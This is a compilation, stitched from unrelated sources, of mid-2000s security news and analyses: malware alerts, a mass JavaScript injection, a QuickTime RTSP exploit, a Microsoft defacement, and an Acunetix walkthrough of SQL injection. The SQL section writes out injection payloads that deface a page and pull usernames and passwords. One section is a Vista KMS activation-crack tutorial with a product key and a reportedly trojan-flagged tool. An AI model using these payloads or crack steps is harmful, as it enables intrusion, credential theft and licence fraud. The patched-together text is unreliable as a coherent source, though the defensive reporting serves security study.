Websense® Security Labs™ ThreatSeeker technology has detected malicious code hosted on China.com's game site. The malware is a variant of VBS/Redlof and is known to commonly infect files with the extension of "html", "htm", "php", "jsp", "htt", "vbs", and "asp".
This malicious download (MD5: e6df57ea75a77112e94036e5138bd063) is placed in a directory that appears to be reserved for game patch downloads. This virus attempts to spread itself by infecting all outbound emails sent by the victim with MS Outlook or Outlook Express.
Mass Attack JavaScript injection - UN and UK Government websites compromised - Date: 04.22.2008
Threat Type: Malicious Web Site / Malicious Code
This mass injection is remarkably similar to the attack we saw earlier this month. When a user browses to a compromised site, the injected JavaScript loads a file named 1.js which is hosted on http://www.nihao[removed].com The JavaScript code then redirects the user to 1.htm (also hosted on the same server). Once loaded, the file attempts 8 different exploits (the attack last April utilised 12). The exploits target Microsoft applications, specifically browsers not patched against the VML exploit MS07-004 as well as other applications. Ominously files named McAfee.htm and Yahoo.php are also called by 1.htm but are no longer active at the time of writing.
There are further similarities too between the two mass attacks. Resident on the latest malicious domain is a tool used in the execution of the attack. An analysis of that tool can be found in the ISC diary entry here. Mentioned in that diary entry is http://www.2117[removed].net. Our blog on that attack can be found here. It appears that same tool was used to orchestrate this attack too.
When we first started tracking the use of this domain, the malicious JavaScript was still making use of http://www.nmida[removed].com/:
Now the attackers are referring to a file hosted on the new domain of http://www.nihao[removed].com:
Sites of varying content have been infected including UK government sites, and a United Nations website as can be seen by the Google search results below.
The number of sites affected is in the hundreds of thousands:
Evidence of a compromise on a United Nations website:
Evidence of a compromise on a UK government website:
Evidence of a compromise on a Chinese tourism website:
Casualties of the previous attack included various US news web sites, a major Israeli shopping portal, and numerous travel sites.
Websense security customers are protected against this attack
The publicly released exploit works successfully when tested with the latest stand-alone QuickTime player application version 7.3. It does not seem to execute any shellcode when tested with the QuickTime browser plugin even though the browser crashes due to the buffer overflow.
At the moment we believe the most likely attack scenarios to appear using this vulnerability could be: 1. Email based attacks. 2. Web browser based attacks.
In the email attack scenario the user receives a malicious email with an attachment containing a file with some extension associated by default to QuickTime Player (e.g. .mov, .qt, qtl., gsm, .3gp, etc). The attachment is not actually a media file, but instead it is an XML file which will force the player to open an RTSP connection on port 554 to the malicious server hosting the exploit. When the QuickTime Player contacts the remote server, it receives back the malformed RTSP response which triggers the buffer overflow and the execution of the attacker’s shellcode immediately. This attack requires users to double-click on the QuickTime multimedia attachment to run. It is worth bearing in mind that this attack may also work with other common media formats such as mpeg, .avi, and other MIME types that are associated with the QuickTime player.
In the Web browser attack scenario, the attack will most likely start with a hyperlinked URL sent to the user. When the user clicks on the URL, the browser loads a page that has a QuickTime streaming object embedded in it. The object initiates the RTSP connection to the malicious server on port 554 and exploit code is sent in response.
We have tested the exploit behavior of the current exploit against some of the common Web browsers. We have seen that with Internet Explorer 6/7 and Safari 3 Beta the attack is prevented.
The browser in this case loads the QuickTime Player as an internal plugin and when the overflow occurs, it triggers some standard buffer overflow protection that shut downs the affected processes before any damage can be done. Attackers may attempt to refine the exploit in the coming days in order to overcome this initial hiccup and work to create a reliable exploit that works on Internet Explorer.
Firefox users are more susceptible to this attack because Firefox farms off the request directly to the QuickTime Player as a separate process outside of its control. As a result, the current version of the exploit works perfectly against Firefox if users have chosen QuickTime as the default player for multimedia formats.
At this time there is no patch available to resolve this issue so to reduce the risk against this threat users are advised to restrict out bound connections on TCP 554 using their firewalls and to avoid following links to untrusted Web sites.
For Windows Vista Business and Windows Vista Enterprise users who prefer to use KMS activation crack method to activate their copy of Windows Vista installation now have a fully automated utility by www.hot8.cn that perform all the activation cracking steps automatically. With the Vista KMS Automatic Activation Tool, you no longer need to open up command prompt and type all those slmgr or cscript the slmgr.vbs commands that need to be done when activate Windows Vista Business or Enterprise edition against spoofed KMS server manually. The automated KMS activation tool will auto run all these process to activate Vista illegally.
Steps to use Vista KMS automatic activation crack tool to activate Windows Vista Business and Enterprise editions
After installing Windows Vista, boot up and login to Windows Vista with the default administrator account user id.
Run Vista automatic activation tool with administrator privileges (right click on Vista_kms_activation_tool.exe and select “Run as Administrator”).
Select the KMS server you want to use from the drop down list in “KMS server options” section. The patch utility will auto test connect to the selected KMS server to verify the KMS service existence and validity. If the KMS server is down or unable to connect to, the program will appear hanging for a while, and then it will display “Connection server anomalies, please wait to try again…” error message, with “Activated” button inactive or grayed out. In this case, select another KMS server.
Note that the Windows Vista system must not download and install any Windows Updates, and never perform genuine Windows validation. You can safely download all or any updates from Microsoft Update after your Vista is been cracked and activated.
If you see “Connect server success can be activated” message at the status bar after selecting the KMS server, it means that Windows Vista is now ready to be activated. Click on Activated” button.
The activation process may take up to 1 minute. So wait patiently while the automatic KMS activation tool perform the process to change your secret product key (should be YFKBB-PQJJV-G996G-VWGXY-2V3X8), register the key and Vista system on KMS server and auto activate the Vista system.
When activated, you will have the “You have successfully activate the Vista” congratulation message.
Download Vista KMS automatic activation tool V2.5 (Vista_kms_activation_tool.exe reported by some anti virus to contain Win32:Killreg-F trojan, use it at your own risk) .
Version 2.5 of Vista KMS automated activate tool incorporates ability to define new KMS server. This is useful if you plan to run your install and create KMS server, or run your own mini KMS server image for activation purpose. By default, the tool has built-in www.hot8.cn and hot8.vipp.cc KMS servers settings. You can easily add new KMS services by clicking on “Definition Server”. A new row will open at the bottom with message “Please input KMS addresses and port (Port is not imported, acquiescence 1688)”. Simply type the host name, IP address, or Internet URL address of new KMS server in the Server Address field, and port number in the Port text box. If you leave the port number blank, default KMS server port number of 1688 will be used. Click on “Connection Test” button when done and follow the above instructions to activate Vista with KMS.
Apparently not only Windows Vista Ultimate can be activated with KMS server, Windows Vista Home Basic and Windows Vista Home Premium activation can also be cracked with the same KMS server hack. The trick is still the same, that is by replacing the two original files related to licensing and activation tokens.dat and pkeyconfig.xrm-ms with the one from Windows Vista Business edition, and thus effectively convert or turn the edition of Windows Vista installed to Business edition with its corresponding product key which can be activated with a KMS host.
A cracker from anti Windows Product Activation (WPA) forum has successfully activate Windows Vista Home Basic by patching the system with frankenbuild crack method and subsequently activate it against a KMS server (you can activate against “public” KMS server, self-build KMS host or KMS local activation server VMware VM image, mini KMS virtual machine image). Why on earth he installed Home Basic edition instead of Vista Ultimate when both same can be cracked is out of comprehend.
Windows Script Host showing query result about Windows Vista activation status by slmgr -dlv command after activating with KMS with frankenbuild crack.
Windows Vista Home Basic activated with KMS still showing as Home Basic edition in System Properties and allowing option to upgrade to higher version.
Thus, the KMS host can be used to activate all editions of Windows Vista, including Home Basic, Home Premium and Ultimate, provided you have patched the system by replacing the original tokens.dat (in \Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareLicensing directory) and pkeyconfig.xrm-ms (in \Windows\System32\Licensing\pkeyconfig folder) by using the similar files that used for activating a frankenbuild system. For guide, visit step-by-step tutorial on how to crack Vista Ultimate.
However, it’s unclear which features will you get in Vista Home Basic and Home Premium that are activated with Business edition KMS product key, as in Vista Ultimate, the features will be restricted to those available for Business edition. If the functionalities and features are restricted to Business edition, it’s indirectly upgrade your cheaper Vista edition.
Note: Frankenbuild Vista can be caught by Microsoft, remember to avoid KB929391 Windows Update hotfix.
A detailed analysis how the website was hacked and how it could have been avoided.
The partner event registration page of the Microsoft UK events website, has been defaced by a hacker who managed to discover and exploit a web application vulnerability in one of the parameters used by the form on the website, which could previously be accessed at:
The hacker, known by the name "rEmOtEr", managed to deface Microsoft’s page by taking advantage of an SQL Injection vulnerability in one of the parameters used by the form that was embedded in the URL of the page. This particular parameter was not being filtered, thus it allowed the hacker to pass any type of crafted code directly to the database being used by this form.
In addition, the hacker managed to discover table names and columns (data fields) inside the database that were being retrieved and shown on the page – this means that any text, or even code, that was inserted inside this column was then displayed on the page.
Tasks performed by the hacker to view database passwords
The following is a short reconstruction of some of the steps performed by the hacker, to discover and exploit the SQL Injection vulnerability in the registration form, allowing him to view stored usernames and passwords in the system:
The parameters of the form were filled in with unusual characters (such as “ ‘ ” and “--“) to see the reaction of the web site. These characters are usually filtered out because they are used in SQL as special commands to talk to a database. The parameters checked included:
Visible inputs (textboxes, dropdown lists, etc..) in the form (POST method)
Hidden inputs from the HTML source code of the page (POST method)
Parameters used in the URL (GET method)
The URL of the website in this case makes use of the two interesting parameters eventID and v2:
http://www.microsoft.co.uk/events/net/PreRegister.aspx?eventID=p83968&v2=1
In trying to manipulate the parameter v2, for example adding an apostrophe to it, gave the following response from the website:
Upon seeing this error, two things can be confirmed:
Server-Side error messages are ENABLED on the web server – These are usually enabled only during development and testing so that any bugs, or in this case vulnerabilities, are discovered before going live. When the website goes live, server-side error messages are usually disabled so that no sensitive information is provided online.
The parameter v2 is NOT being filtered for malicious characters/code – This means that whatever this parameter contains, it will be passed to the SQL Server being used without any filtering.
This long SQL error revealed a lot of important information about the underlying database, which were used by the hacker to further extract and change data stored inside this database.
The hacker obtained more valuable information directly from the database, by playing around with the SQL Commands passed through this parameter through trial and error. He was helped further by the error messages being displayed on the page.
The SQL Command 1 having 1=1-- was sent with the v2 parameter where it was appended to the main SQL Query sent to the database. This added a condition to the SQL Query, which is always true (1=1), and in this case it confused the SQL Server because of a GROUP BY command producing the following error:
http://www.microsoft.co.uk/events/net/PreRegister.aspx?eventID=p83968&v2=1 having 1=1--
The result? More database information was revealed!
The table name MultivenueLists and some column names such as recordID and venueStatus were revealed, from which the hacker understood more about the structure of the database.
Note:
In Structured Query Language (SQL) columns are referred to with the notation TABLE(dot)COLUMN which is why the columns are shown like MultivenueLists.recordID)
Once the hacker got to know the names of tables and columns, he injected some text inside a specific column by adding a statement such as 1 update MultivenueLists set venueStartDate=’hacked by rEmOtEr’;-- to the input of the v2 parameter in the URL:
…ster.aspx?eventID=p83968&v2=1 update MultivenueLists set venueStartDate=’hacked by rEmOtEr’;--
Figure 2: The resulting page does not give an error this time, but the text just inserted into the database is displayed on the page
Using the UNION SELECT statement, the hacker managed to obtain a list of usernames and passwords from the system by guessing the names of two columns (username and password) and one table (users).
This was the SQL Command used for the v2 parameter to obtain the usernames:
…ster.aspx?eventID=p83968&v2=-1 union select 1,2,3,4,username,6,7 from users--
Figure 3
This was the SQL Command used for the v2 parameter to obtain the passwords:
…ster.aspx?eventID=p83968&v2=-1 union select 1,2,3,4,password,6,7 from users—
Figure 4
6. Using a combination of queries with userID the hacker was able to determine which password belongs to which username.
Tasks performed by the hacker to deface the page
The following is a short reconstruction of some of the steps performed by the hacker to discover and exploit the SQL Injection in the registration form:
Once the hacker knew enough about how to inject his own code into the website’s database, he prepared a simple HTML page on a third party remote host to be used for the attack.
Using similar commands as those used to display his own text into the page, the hacker inserted the following URL of the HTML website hosted at the third party remote host:
The form page on the Microsoft site is created in such a way, that it loads up a specific text from the database when a user browses on the page (typical of CMS Systems). Since this text has been replaced by the xhref link above by the hacker, this took over the entire look of the page by loading the contents from the external host.
This is what the web page looked like as a result of this defacement:
Figure 5
What lead to this defacement?
There was a combination of two things that led to this defacement happening - apart from a hacker willing to take a shot at a form hosted on a Microsoft website:
SQL Injection – One of the parameters in the URL was being sent directly to the database without being properly filtered before. This provided a channel for the hacker to talk directly to the database with the exact same rights as the connection from the web server and the database server.
Error Messages – From the enabled SQL error messages on the website, the hacker could get an idea of how the database was structured. This helped him into refining an SQL command, so that the database processed the instructions to insert the defacement code into the database to deface the site.
How could it have been prevented? The best way to prevent being hacked is to regularly check your website for vulnerabilities that can be exploited by hackers. In doing so, this SQL injection vulnerability could have been detected and fixed before the page went live.
How to keep your website secure
The larger the website the more complex it is to regularly check for vulnerabilities on each page. The hacked page on the Microsoft site was just a small part of a much larger website which was overlooked – a common result of manual security auditing.
This complexity can be overcome with the use of an automated web application scanner such as Acunetix Web Vulnerability Scanner. Using such a powerful, yet easy to operate tool, you are able to scan every parameter on each and every form on your website, for hundreds of vulnerabilities in a fully automated way. This would of course cut on the complexity and time required to perform a security audit on your website.
The use of an automated web application scanner also means that whoever performs the audit does not require any technical knowledge about web vulnerabilities, instead only needs to run the application to scan the website and produce a vulnerability report.
Hackers on Sunday broke into a part of Microsoft's French Web site, replacing the front page with online graffiti.
The intruders were able to access the server that was running "http://experts.microsoft.fr/", Microsoft confirmed Monday. The attack was claimed by Turkish hackers using the handle "TiTHacK", according to Zone-H, a security Web site that keeps an archive with screenshots of defaced Web sites.
The attackers were probably able to penetrate the server running the Web site due to faulty configuration, Microsoft said in a statement on Monday. "Microsoft took the appropriate action to resolve the issue and stop any additional criminal activity," the company said.
After breaking in, the attackers defaced the Microsoft Web site, leaving the following note: "Hi Master (: Your System 0wned By Turkish Hackers! redLine ownz y0u! Special Thanx And Gretz RudeBoy |SacRedSeer| The_Bekir And All Turkish HacKers next target: microsoft.com date: 18/06/2006 @ 19:06 WE WERE HERE...."
While so-called Web site defacements still occur often, they have become less high-profile in recent years as other, financially-motivated threats take the spotlight.
Microsoft is working with law enforcement to investigate and take appropriate action against the attackers, the company said.
The compromised Web site was offline most of Monday. Microsoft said it is working to restore the site, which is hosted at an unidentified third-party Web hosting company. The Web site runs Microsoft's Windows Server 2003 with IIS 6.0 Web server software, according to Netcraft, a UK-based Internet-monitoring company.
"We apologise if customers are inconvenienced by the unavailability of the affected Web site," Microsoft said. "Microsoft is committed to helping protect our customers and we're working diligently with the third-party hosting company to restore the functionality of this Web site as soon as possible."
